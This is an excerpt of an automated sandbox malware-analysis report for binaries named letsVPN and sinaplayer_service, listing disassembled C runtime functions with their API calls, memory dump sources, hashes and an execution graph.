                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    • Opcode ID: d3af5bbe54961b1d7dcc5b363a3e559933824cf9791eeeca8759782873a9d65a
                                                                                                                                                                                                    • Instruction ID: 9ebde2755e581dadbce0d7f7b890ea15efc5b0c31b30096d9125daad0d26f9ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3af5bbe54961b1d7dcc5b363a3e559933824cf9791eeeca8759782873a9d65a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0241D573A009688BF7F78E6C90453EC27A1A74D398F54C41AF6929FAC7CD388A4D8741
                                                                                                                                                                                                    Function 000000018001D3C0 Relevance: 6.1, APIs: 4, Instructions: 106COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringTypefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3522554955-0
                                                                                                                                                                                                    • Opcode ID: accd0cf4b4f14c420e85aae7a96ea48fd0b0a3355ec4bdfb55f1f59843f4ccff
                                                                                                                                                                                                    • Instruction ID: 2540e719a89882b95ad61e0eb3008961b3879a771be8f5be22c7ca85185634ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: accd0cf4b4f14c420e85aae7a96ea48fd0b0a3355ec4bdfb55f1f59843f4ccff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8418332200F8887EBA69F2598403D96395F74DBE8F588616FE2E477D5DF38D6098300
                                                                                                                                                                                                    Function 0000000180007878 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$Copy_strFileHeaderRaiseThrow_pclosefgetsstd::exception::_std::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1743889360-0
                                                                                                                                                                                                    • Opcode ID: 4e54a260fa7be0e3ff7fb024a1e4e820d67683f74a8e9cdd18430075a31ae9e2
                                                                                                                                                                                                    • Instruction ID: 100ce4ba59c252cdb160de8ee261dbdff430980fbbf453e23859cd0748682005
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e54a260fa7be0e3ff7fb024a1e4e820d67683f74a8e9cdd18430075a31ae9e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6317431608B8981EBA2DB14E4413EA7790F78C7D4F545225B69D06BAADF7CC349CB40
                                                                                                                                                                                                    Function 0000000180027A0C Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2615622293-0
                                                                                                                                                                                                    • Opcode ID: 118e86b0fdc198884dd44a1f401273e20d05bbc0534e4c28fb2d1664b76791dc
                                                                                                                                                                                                    • Instruction ID: 9effb36682a3647b8937f0e7358b2fc8195419eedb52e07462cad8161f0c1b4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118e86b0fdc198884dd44a1f401273e20d05bbc0534e4c28fb2d1664b76791dc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621C3723146A881EBE3461590503BDA7E2E3C8BF4F58C125FA9A0AAC6DD2CC749C712
                                                                                                                                                                                                    Function 0000000180018D28 Relevance: 6.1, APIs: 4, Instructions: 60stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3089783468-0
                                                                                                                                                                                                    • Opcode ID: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction ID: c157a4136c12881e15d1d6466a1d1e032bd19282ed3789510d37b6ed984cd8dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211E732204B8C41FBE78615B4443FD67A1AB9A7D4F18C129FA96077C9CE68C74DD741
                                                                                                                                                                                                    Function 00000001800039A3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand$_getptd
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 2986147986-2662692612
                                                                                                                                                                                                    • Opcode ID: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
                                                                                                                                                                                                    • Instruction ID: f4cbb9994f2192c02038a558b7f24809a3cbc7a7a85d0f49fb9528de59c6dda1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A1129323249D885EB9FCA2F90023DC7659E38DBC0F448025AA46877C5DE29C6998342
                                                                                                                                                                                                    Function 0000000180012D96 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread__addlocaleref_calloc_crt_initptdfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 144977139-0
                                                                                                                                                                                                    • Opcode ID: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction ID: dd0f1f0c231c5fc80c7439be1b3e8a88326aa7477beda5119a12924904dd7238
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F0BB30205E48C6FBDBAB21C8143E951819B4C7E1F44C624B5294A3D2FE688B5D8360
                                                                                                                                                                                                    Function 000000018001B814 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _amsg_exit_getptd$Ex_nolock_getptd_noexit_updatetlocinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3801014656-0
                                                                                                                                                                                                    • Opcode ID: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction ID: d4aacb6000a69ceffea1ebe97908f6bebd0b7ae2b0ac0e702d7cc498c4538d71
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F0303161190882FBDAAB5588427E82269EB4CBC4F0C8235FA18473D2DF148748C711
                                                                                                                                                                                                    Function 0000000180018208 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_lseeki64_write
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2577073331-3916222277
                                                                                                                                                                                                    • Opcode ID: 75876cad2acb07627db3e6d8a17810d58ab564f56b183f15df871a460318ffe0
                                                                                                                                                                                                    • Instruction ID: bbc1748b0e4912f4bbdfd24d31f7153fcdc314768b3959c9ff65e79e13f88314
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75876cad2acb07627db3e6d8a17810d58ab564f56b183f15df871a460318ffe0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11B172308F488ADB978F29D4403AC7761FB4DBE4F589206EA69433D9DE38CB599700

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:0%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:53.5%
                                                                                                                                                                                                    Total number of Nodes:71
                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                    execution_graph 71549 537aaa 71564 537d20 71549->71564 71551 537ab6 __crtGetShowWindowMode 71552 537ada 71551->71552 71553 537b06 71552->71553 71554 537afc _amsg_exit 71552->71554 71555 537b3b 71553->71555 71556 537b0f _initterm_e 71553->71556 71554->71555 71557 537b49 _initterm 71555->71557 71559 537b64 __IsNonwritableInCurrentImage 71555->71559 71556->71555 71558 537b2a __onexit 71556->71558 71557->71559 71561 537be7 exit 71559->71561 71562 537c36 71559->71562 71565 515f90 ??0AtExitManager@base@@QAE ?Init@CommandLine@@SA_NHPBQBD 71559->71565 71561->71559 71562->71558 71563 537c3f _cexit 71562->71563 71563->71558 71564->71551 71622 520320 ?RegisterProvider@PathService@@SAXP6A_NHPAVFilePath@base@@@ZHH 71565->71622 71567 515fcd ??0FilePath@base@@QAE 71623 515d70 30 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 71567->71623 71569 515fdf 71624 515100 14 API calls 71569->71624 71571 516001 ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ 71572 516023 ??0LoggingSettings@logging@@QAE ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NABULoggingSettings@1@ ?SetLogItems@logging@@YAX_N000 ?GetMinLogLevel@logging@ 71571->71572 71573 516018 ??3@YAXPAX 71571->71573 71574 516075 ??0LogMessage@logging@@QAE@PBDHH 71572->71574 71575 5160b5 71572->71575 71573->71572 71625 5118e0 24 API calls 71574->71625 71577 5160c3 ??1LogMessage@logging@@QAE 71575->71577 71578 5160ce ??0FilePath@base@@QAE ?Get@PathService@@SA_NHPAVFilePath@base@@ 71575->71578 71577->71578 71580 516135 71578->71580 71581 5160ed ?GetMinLogLevel@logging@ 71578->71581 71579 5160a2 ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W 71626 5118e0 24 API calls 71579->71626 71628 515ec0 83 API calls 71580->71628 71584 5160f4 71581->71584 71585 51611b 71581->71585 71627 5118e0 24 API calls 71584->71627 71586 516123 ??1LogMessage@logging@@QAE 71585->71586 71587 51612b 71585->71587 71586->71587 71589 516228 ??1FilePath@base@@QAE ??1FilePath@base@@QAE ??1FilePath@base@@QAE ??1AtExitManager@base@@QAE 71587->71589 71588 51613a 71629 51aec0 68 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 71588->71629 71640 537604 6 API calls ___raise_securityfailure 71589->71640 71592 516141 71630 52a4b0 ??0LockImpl@internal@base@@QAE 71592->71630 71594 516258 71594->71559 71596 51614c 71631 52ae00 201 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 71596->71631 71598 51615f 71599 516163 71598->71599 71600 516179 ?GetMinLogLevel@logging@ 71598->71600 71632 515ec0 83 API calls 71599->71632 71602 516180 71600->71602 71603 5161a7 71600->71603 71634 5118e0 24 API calls 71602->71634 71605 5161ba 71603->71605 71606 5161af ??1LogMessage@logging@@QAE 71603->71606 71604 516168 71633 51c890 691 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 71604->71633 71635 52ccc0 39 API calls 71605->71635 71606->71605 71609 51616f 71639 52a6c0 36 API calls 71609->71639 71611 5161c5 71636 515ec0 83 API calls 71611->71636 71613 5161cc 71637 51c890 691 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 71613->71637 71616 5161d3 ?GetMinLogLevel@logging@ 71617 516210 71616->71617 71618 5161de ??0LogMessage@logging@@QAE@PBDHH 71616->71618 71617->71609 71620 516215 ??1LogMessage@logging@@QAE 71617->71620 71638 5118e0 24 API calls 71618->71638 71620->71609 71621 516205 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J 71621->71617 71622->71567 71623->71569 71624->71571 71625->71579 71626->71575 71627->71585 71628->71588 71629->71592 71630->71596 71631->71598 71632->71604 71633->71609 71634->71603 71635->71611 71636->71613 71637->71616 71638->71621 71639->71589 71640->71594

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    Function 6D0AD40E Relevance: 122.7, APIs: 36, Strings: 34, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,6D0ACA0D,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0AD411
                                                                                                                                                                                                    • __initp_misc_winsig.LIBCMT ref: 6D0AD42C
                                                                                                                                                                                                      • Part of subcall function 6D0AC60E: EncodePointer.KERNEL32(?,6D0AD437,00000000,00000000,00000000,00000000,00000000,?,6D0ACA0D,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0AC613
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000), ref: 6D0AD448
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6D0AD45C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6D0AD46F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6D0AD482
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6D0AD495
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 6D0AD4A8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 6D0AD4BB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 6D0AD4CE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 6D0AD4E1
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 6D0AD4F4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 6D0AD507
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 6D0AD51A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 6D0AD52D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 6D0AD540
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 6D0AD553
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 6D0AD566
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 6D0AD579
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 6D0AD58C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 6D0AD59F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 6D0AD5B2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 6D0AD5C5
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6D0AD5D8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 6D0AD5EB
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 6D0AD5FE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 6D0AD611
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6D0AD624
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 6D0AD637
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 6D0AD64A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 6D0AD65D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 6D0AD670
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 6D0AD683
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 6D0AD696
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 6D0AD6A9
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 6D0AD6BC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$EncodePointer$HandleModule__initp_misc_winsig
                                                                                                                                                                                                    • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                                                                                                                                                                    • API String ID: 1581159588-2934716456
                                                                                                                                                                                                    • Opcode ID: 782c804ff5e80971a94adfbcc74c6f00bdc1b9dcd54343ffd2b704ecf685e36c
                                                                                                                                                                                                    • Instruction ID: aa0b94a957df22230610cd48ec002b70c2ccce1577efc2dabbc7e2b5d93b3e66
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 782c804ff5e80971a94adfbcc74c6f00bdc1b9dcd54343ffd2b704ecf685e36c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB6168F2810219AAAB40AFB5AC54F5BBBF8FBD7700304581AE624D3552F7F9D0428F65
                                                                                                                                                                                                    Function 6D095C91 Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 335timeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _wcspbrk.LIBCMT(?,6D095F14), ref: 6D095CC5
                                                                                                                                                                                                    • towlower.MSVCR120(00000000), ref: 6D095CF2
                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6D095D10
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 6D095D4F
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 6D095D66
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 6D095DCE
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 6D095DE5
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 6D095E4D
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 6D095E64
                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 6D095EB8
                                                                                                                                                                                                      • Part of subcall function 6D09619F: wcsrchr.MSVCR120(6D095ECA,0000002E,00000000,?,?,6D095ECA,00000400,?), ref: 6D0961FA
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.exe,00000000,?,?,6D095ECA,00000400,?), ref: 6D09620D
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.cmd,00000000,?,?,6D095ECA,00000400,?), ref: 6D09621E
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.bat,00000000,?,?,6D095ECA,00000400,?), ref: 6D09622F
                                                                                                                                                                                                      • Part of subcall function 6D09619F: _wcsicmp.MSVCR120(00000000,.com,00000000,?,?,6D095ECA,00000400,?), ref: 6D096240
                                                                                                                                                                                                    • _getdrive.MSVCR120 ref: 6D0AF5D8
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0AF5E2
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0AF6E1
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0AF6EB
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D43BF
